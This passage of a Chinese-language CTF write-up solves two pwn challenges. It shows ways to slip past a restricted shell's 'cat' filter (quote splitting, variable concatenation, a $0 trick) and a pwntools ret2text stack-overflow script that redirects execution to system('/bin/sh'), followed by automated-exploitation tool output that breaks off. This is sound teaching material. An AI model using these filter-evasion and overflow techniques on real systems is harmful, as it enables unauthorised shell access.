src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-684\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5cat\u662f\u4e0d\u80fd\u7528\u7684<\/p>\n\n\n\n<p>\u90a3\u6211\u4eec\u600e\u4e48\u83b7\u53d6\u5230flag\u5462\uff1f<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u8981\u5f15\u51fa\u6307\u4ee4\u7684\u62fc\u63a5<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0abing\u641c\u7d22\u90fd\u80fd\u641c\u5230\u80fd\u7528\u7684\u6587\u7ae0\uff08\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-29-1024x897.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"897\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-29-1024x897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-683\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b2c\u4e00\u4e2a\u5c31\u662f\u5f88\u597d\u7528\u7684\u4e00\u7bc7<\/p>\n\n\n\n<p><a href=\"https:\/\/www.cnblogs.com\/falling-dusk\/p\/17871620.html\">pwn\u4e2d\u5e38\u89c1\u7684\u7ed5\u8fc7\uff08\u4ee5\u540e\u89c1\u591a\u4e86\u4f1a\u6162\u6162\u66f4\u7684\uff0c\u5495\u5495\u5495\uff09 &#8211; Falling_Dusk &#8211; 
\u535a\u5ba2\u56ed<\/a><\/p>\n\n\n\n<p>\u535a\u5ba2\u91cc\u9762\u4e13\u95e8\u6709\u8fc7\u6ee4\u201ccat\u201d\u7684\u7ed5\u8fc7\u65b9\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-28-1024x693.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"693\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-28-1024x693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-682\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8ddf\u7740\u535a\u5ba2\u4e00\u4e2a\u65b9\u6cd5\u4e00\u4e2a\u65b9\u6cd5\u8bd5\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u5927\u6982\u9884\u671f\u6d41\u7a0b\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc ctf.ctbu.edu.cn 34193<br>Enter your command: sh<br>Privileges elevated! Starting restricted shell...<br>Restricted shell. ls is allowed, but some commands are blocked.<br>Try to get the flag, but remember: direct access is blocked!<br>$ ls<br>attachment<br>docker-entrypoint.sh<br>flag<br>$ cat flag<br>Command contains forbidden operations. 
Try another way.<br>$ c'a't flag                                              #\u6307\u4ee4\u62fc\u63a5\u7ed5\u8fc7\u6cd5<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<br>$ ls ; cat flag                                           #\u53e6\u7c7b\u7684\u7ed5\u8fc7\u68c0\u6d4b\u7684\u65b9\u6cd5\uff08\u535a\u5ba2\u91cc\u6ca1\u6709\uff09<br>attachment<br>docker-entrypoint.sh<br>flag<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<br>$ A=ca; B=t; $A$B flag                                    #\u535a\u5ba2\u91cc\u7684\u7b2c\u4e00\u79cd\u529e\u6cd5<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\uff0c\u5c31\u7b97\u4e0a\u9762\u7684\u6240\u6709\u4f60\u90fd\u6ca1\u5173\u6ce8\uff0c\u4f60\u53ea\u662f\u6253\u5f00IDA\u4e86\uff0c\u7136\u540e\u627e\u5230main\u51fd\u6570\u4e86\uff0c\u7136\u540e\u7ed9\u4e86\u5b83\u76f8\u5173\u51fd\u6570\u7684\u53cd\u7f16\u8bd1\u4ee3\u7801\u5185\u5bb9<\/p>\n\n\n\n<p>\u4f60\u968f\u610f\u5237\u7ed9\u4efb\u4f55\u4e00\u4e2aAI\u90fd\u80fd\u505a\u51fa\u672c\u9898\uff0c\u6bd4\u5982\u8c46\u5305\uff0ckimi\uff0cchatgpt\uff0cgrok\u7b49\u7b49\u7b49\u7b49<\/p>\n\n\n\n<p>\u751a\u81f3\u505a\u6cd5\u8fd8\u5f88\u591a\u6837<\/p>\n\n\n\n<p>\u8fd9\u91ccai\u6709\u5f88\u591a\u79cd\u505a\u6cd5\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<p>\u4e24\u6b21$0\u63d0\u6743\uff0c\u76f4\u63a5\u907f\u514dcat\u68c0\u6d4b<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc ctf.ctbu.edu.cn 34193<br>Enter your command: $0<br>Privileges elevated! Starting restricted shell...<br>Restricted shell. 
ls is allowed, but some commands are blocked.<br>Try to get the flag, but remember: direct access is blocked!<br>$ $0<br>ls<br>attachment<br>docker-entrypoint.sh<br>flag<br>cat flag<br>coctf{$0_1s_r1ght_981e8230-0763-4970-9796-fd3209b4dc21}<\/code><\/pre>\n\n\n\n<p>\u5f88\u795e\u5947\u5427\uff0c\u5177\u4f53\u539f\u7406\u8fd9\u91cc\u5c31\u4e0d\u591a\u8bf4\u4e86\uff0c\u5efa\u8bae\u81ea\u884cAI\uff0c\u5b9e\u5728\u4e0d\u61c2\u53c8\u597d\u5947\u7684\uff0c\u5728\u7fa4\u91cc\u627e\u51fa\u9898\u4ebaokabe\uff08<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ret2text<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a\u5e38\u89c4\u7684ret2text<\/p>\n\n\n\n<p>\u4f5c\u4e3a\u6808\u6ea2\u51fa\u7684\u7ecf\u5178\u8003\u70b9\uff0cret2text\u662f\u65e0\u6570pwner\u7684\u542f\u8499<\/p>\n\n\n\n<p>\u5f53\u7136\uff0c\u8fd9\u91cc\u51fa\u9898\u4eba\u5f97\u5148\u81f4\u6b49\u6ed1\u8dea\uff0c\u5728\u9898\u5e72\u91cc\u6dfb\u52a0\u4e86\u65e0\u6548\u7684\u4fe1\u606f\uff08\u6808\u5e73\u8861\uff09\uff0c\u56e0\u4e3a\u51fa\u9898\u4eba\u8bef\u4ee5\u4e3a\u81ea\u5df1\u5f04\u768464\u4f4d\u67b6\u6784\u4e86\u2026\u2026Orz<\/p>\n\n\n\n<p>\u8bf4\u56de\u9898\u76ee<\/p>\n\n\n\n<p>\u6211\u4eec\u8fdbmain\u51fd\u6570\uff0cF5\u53cd\u7f16\u8bd1\u540e\uff0c\u770b\u5230\u7684\u5c31\u662f\u8fd9\u4e2a\u60c5\u51b5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-27.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"214\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-27.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-681\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f88\u7a7a\u7684main\u51fd\u6570\uff0c\u5c31\u4e00\u4e2a<code>vuln()<\/code>\u51fd\u6570<\/p>\n\n\n\n<p>\u53cc\u51fb\u8ddf\u8fdb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssize_t vuln()<br>{<br>  _BYTE buf&#91;24]; \/\/ &#91;esp+Ch] &#91;ebp-1Ch] BYREF<br><br>  printf(\"Enter your payload: \");<br>  return read(0, buf, 0x64u);<br>}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u51fa\u73b0\u4e86\u6211\u4eec\u6240\u5173\u5fc3\u7684\u6f0f\u6d1e\u70b9<\/p>\n\n\n\n<p>read\u51fd\u6570\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/p>\n\n\n\n<p>\u4ee3\u7801\u4e2d\u5b9a\u4e49\u4e86\u4e00\u4e2a\u6808\u4e0a\u7684\u7f13\u51b2\u533a <code>buf<\/code>\uff0c\u5927\u5c0f\u4e3a <strong>24 \u5b57\u8282<\/strong>\uff08<code>_BYTE buf[24]<\/code>\uff09\u3002\u4f46\u968f\u540e\u8c03\u7528 <code>read(0, buf, 0x64u)<\/code> \u65f6\uff0c\u8981\u6c42\u4ece\u6807\u51c6\u8f93\u5165\uff08<code>0<\/code> \u8868\u793a\u6807\u51c6\u8f93\u5165\uff09\u8bfb\u53d6 <strong>0x64 \u5b57\u8282\uff08\u5373 100 \u5b57\u8282\uff09<\/strong> \u5230 <code>buf<\/code> \u4e2d\u3002<\/p>\n\n\n\n<p>\u663e\u7136\uff0c100 \u5b57\u8282\u7684\u8f93\u5165\u8fdc\u5927\u4e8e\u7f13\u51b2\u533a 24 \u5b57\u8282\u7684\u5bb9\u91cf\uff0c\u591a\u4f59\u7684\u6570\u636e\u4f1a \u201c\u6ea2\u51fa\u201d 
\u7f13\u51b2\u533a<\/p>\n\n\n\n<p>\u90a3\u4e48\u73b0\u5728\u56de\u5230\u6808\u6ea2\u51fa\u8fd9\u4e2a\u8bdd\u9898\uff0c\u4ec0\u4e48\u662f<code>\u6808\u6ea2\u51fa<\/code>\uff1f<\/p>\n\n\n\n<p>\u521a\u521a\u8bf4\u5230\u4e86\uff0c\u8f93\u5165\u7684\u5185\u5bb9\u8fdc\u5927\u4e8ebuf\u7684\u5bb9\u91cf\uff0c\u591a\u4f59\u6570\u636e\u4f1a\u6ea2\u51fa\u7f13\u51b2\u533a\uff0c\u800c\u8fd9\u90e8\u5206\u591a\u4f59\u7684\u6570\u636e\uff0c\u4f1a\u5f80\u9ad8\u5730\u5740\u7684\u90e8\u5206\u8fdb\u884c\u5b58\u653e\uff0c\u4e5f\u5c31\u662f\u4f1a\u8986\u76d6\u539f\u672c\u5b83\u4eec\u5b58\u653e\u7684\u5185\u5bb9\uff0c\u5b58\u5165\u4f60\u653e\u5165\u7684\u6570\u636e\u5185\u5bb9\uff0c\u4e0d\u7ba1\u662f\u5783\u573e\u6570\u636e\u4e5f\u597d\uff0c\u4f60\u523b\u610f\u4fee\u6539\u7684\u6076\u610f\u6570\u636e\u5730\u5740\u4e5f\u597d\uff0c\u90fd\u4f1a\u5199\u8fdb\u53bb<\/p>\n\n\n\n<p>\u6808\u4e0a\u7684\u5e03\u5c40\u5927\u6982\u5c31\u662f\u4e0b\u9762\u8fd9\u6837<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u9ad8\u5730\u5740   |||&#91;\u8fd4\u56de\u5730\u5740]   \/\/ \u51fd\u6570\u6267\u884c\u5b8c\u540e\u8981\u56de\u5230\u7684\u4f4d\u7f6e<br>        |||&#91;\u57fa\u6307\u9488ebp]  \/\/ \u4fdd\u5b58\u7684\u6808\u5e95\u6307\u9488<br>\u4f4e\u5730\u5740   |||&#91;buf]       \/\/ 
24\u5b57\u8282\u7f13\u51b2\u533a\uff08\u4f4e\u5730\u5740\u65b9\u5411\uff09<\/code><\/pre>\n\n\n\n<p>\u90a3\u4e48\u5982\u679c\uff0c\u4f60\u586b\u5145\u5b8cbuf\u5185\u5bb9\uff0c\u518d\u8986\u76d6\u6389ebp\u7684\u6307\u9488\u5185\u5bb9<\/p>\n\n\n\n<p>\u7136\u540e\u5c31\u5230\u4e86\u8fd4\u56de\u5730\u5740\u5b58\u653e\u7684\u533a\u57df<\/p>\n\n\n\n<p>\u5982\u679c\u4f60\u4f20\u5165\u4e00\u4e2a\u4f60\u7cbe\u5fc3\u627e\u5230\u7684\u5185\u5b58\u5730\u5740\u5185\u5bb9\uff0c\u5b83\u4f1a\u600e\u4e48\u6837\u5462\uff1f<\/p>\n\n\n\n<p>\u5f53\u7136\u662f\u53bb\u6267\u884c\u4f60\u90a3\u4e2a\u5730\u5740\u4e0a\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u6211\u4eec\u770b\u5230func\u7a97\u53e3\u6709win\u51fd\u6570\u5b57\u6837\uff0c\u70b9\u8fdb\u53bb\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-26.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"595\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-26.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-680\"  sizes=\"auto, (max-width: 909px) 100vw, 909px\" 
\/><\/div><\/figure>\n\n\n\n<p><em><strong>system(&#8220;\/bin\/sh&#8221;)<\/strong><\/em><\/p>\n\n\n\n<p>\u4e5f\u8bb8\u4f60\u4e0d\u77e5\u9053\u8fd9\u662f\u4ec0\u4e48\u610f\u601d\uff0c\u4f46\u662f\u4f60\u641c\u4e00\u641c\u5462<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\u968f\u4fbf\u641c\u641c\u5c31\u77e5\u9053\u8fd9\u662f\u4e00\u4e2a\u6253\u5f00shell\u7684system\u8c03\u7528<\/p>\n\n\n\n<p>\u90a3\u5982\u679c\uff0c\u6211\u4eec\u5c06\u8fd4\u56de\u5730\u5740\u7be1\u6539\u6210<code>win()<\/code>\u51fd\u6570\u7684\u5730\u5740<\/p>\n\n\n\n<p>\u662f\u4e0d\u662f\u5c31\u4f1a\u8ba9\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b\u8d70\u5230\u6211\u4eec\u60f3\u8981\u7684\u5730\u65b9\u53bb\uff1f<\/p>\n\n\n\n<p>\u4e0d\u5982\u76f4\u63a5\u5f00\u59cb\u8bd5\u4e00\u8bd5<\/p>\n\n\n\n<p>\u914d\u7f6e\u597d\u57fa\u672c\u7684pwn\u811a\u672c\u73af\u5883<\/p>\n\n\n\n<p>\uff08\u4f60\u7406\u5e94\u5728\u524d\u9762\u7684\u9898\u76ee\u91cc\u914d\u7f6e\u597d\u624d\u5bf9\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>io = process(\".\/text\")<br>payload = b'a'*(28 + 4) + p32(0x08049196)<br>io.sendline(payload)<br>io.interactive()<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">[x] Opening connection to ctf.ctbu.edu.cn on port 34196<br>[x] Opening connection to ctf.ctbu.edu.cn on port 34196: Trying 172.30.254.48<br>[+] Opening connection to ctf.ctbu.edu.cn on port 34196: Done<br>[*] Switching to interactive mode<br>Enter your payload: cat flag<br>coctf{ret2flag_640a465c2af5}<\/pre>\n\n\n\n<p>\u540e\u8bdd\uff1a\u5982\u679c\u6709\u5de5\u5177\u5c0f\u5b50\uff0c\u7528\u5999\u5999\u5c0f\u5de5\u5177\u80fd\u4e00\u628a\u68ad<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ python pwnpasi.py -l ..\/first_question\/text -ip ctf.ctbu.edu.cn -p 34196<br><br><br>        ____                 ____            _ <br>       |  _ \\ __      ___ _|  _ \\ __ _ ___(_)<br>       | |_) |\\ \\ \/\\ \/ \/ '_ \\ |_) \/ _` \/ __| |<br>       |  __\/  \\ V  V \/| | | |  __\/ (_| \\__ \\ |<br>       |_|      
\\_\/\\_\/ |_| |_|_|   \\__,_|___\/_|<br><br>    Automated Binary Exploitation Framework v3.0<br>    by Security Research Team<br>    https:\/\/github.com\/heimao-box\/pwnpasi<br><br>&#91;*] &#91;09:44:09] target binary: .\/..\/first_question\/text<br>&#91;*] &#91;09:44:09] remote target: ctf.ctbu.edu.cn:34196<br>&#91;*] &#91;09:44:09] detecting libc path automatically<br>&#91;+] &#91;09:44:09] libc path detected: \/lib\/i386-linux-gnu\/libc.so.6<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                   BINARY ANALYSIS PHASE                    \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:09] setting executable permissions<br>&#91;*] &#91;09:44:09] collecting binary security information<br>&#91;*] &#91;09:44:09] collecting binary information<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  BINARY SECURITY ANALYSIS                  
\u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>    Feature     |     Status      |   Risk Level   <br>---------------------------------------------------<br>     RELRO      |  Partial RELRO  |     MEDIUM     <br> Stack Canary   | No canary found |      HIGH      <br>    NX Bit      |   NX enabled    |       LOW      <br>      PIE       | No PIE (0x8048000) |     MEDIUM     <br> RWX Segments   |     Unknown     |       LOW      <br><br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     FUNCTION ANALYSIS                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] scanning PLT functions<br>&#91;*] &#91;09:44:10] analyzing PLT table and available 
functions<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     FUNCTION ANALYSIS                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>   Function     |     Address     |    Available   <br>---------------------------------------------------<br>     write      |       N\/A       |       NO       <br>     puts       |       N\/A       |       NO       <br>    printf      |    08049060     |       YES      <br>     main       |    080491fe     |       YES      <br>    system      |    08049070     |       YES      <br>   backdoor     |       N\/A       |       NO       <br>  callsystem    |       N\/A       |       NO       <br>&#91;*] &#91;09:44:10] <br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                    ROP GADGET DISCOVERY                    
\u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] searching for x32 ROP gadgets<br>&#91;*] &#91;09:44:10] searching for ROP gadgets (x32)<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     ROP GADGETS (x32)                      \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>  Gadget Type   |     Address     |     Status     <br>---------------------------------------------------<br>    pop eax     |       N\/A       |    NOT FOUND   <br>    pop ebx     |       N\/A       |    NOT FOUND   <br>    pop ecx     |       N\/A       |    NOT FOUND   <br>    pop edx     |       N\/A       |    NOT FOUND   <br>&#91;*] &#91;09:44:10] 
<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                    PADDING CALCULATION                     \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] performing dynamic stack overflow testing<br>&#91;*] &#91;09:44:10] testing for stack overflow vulnerability<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  STACK OVERFLOW DETECTION                  \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] Testing overflow: 
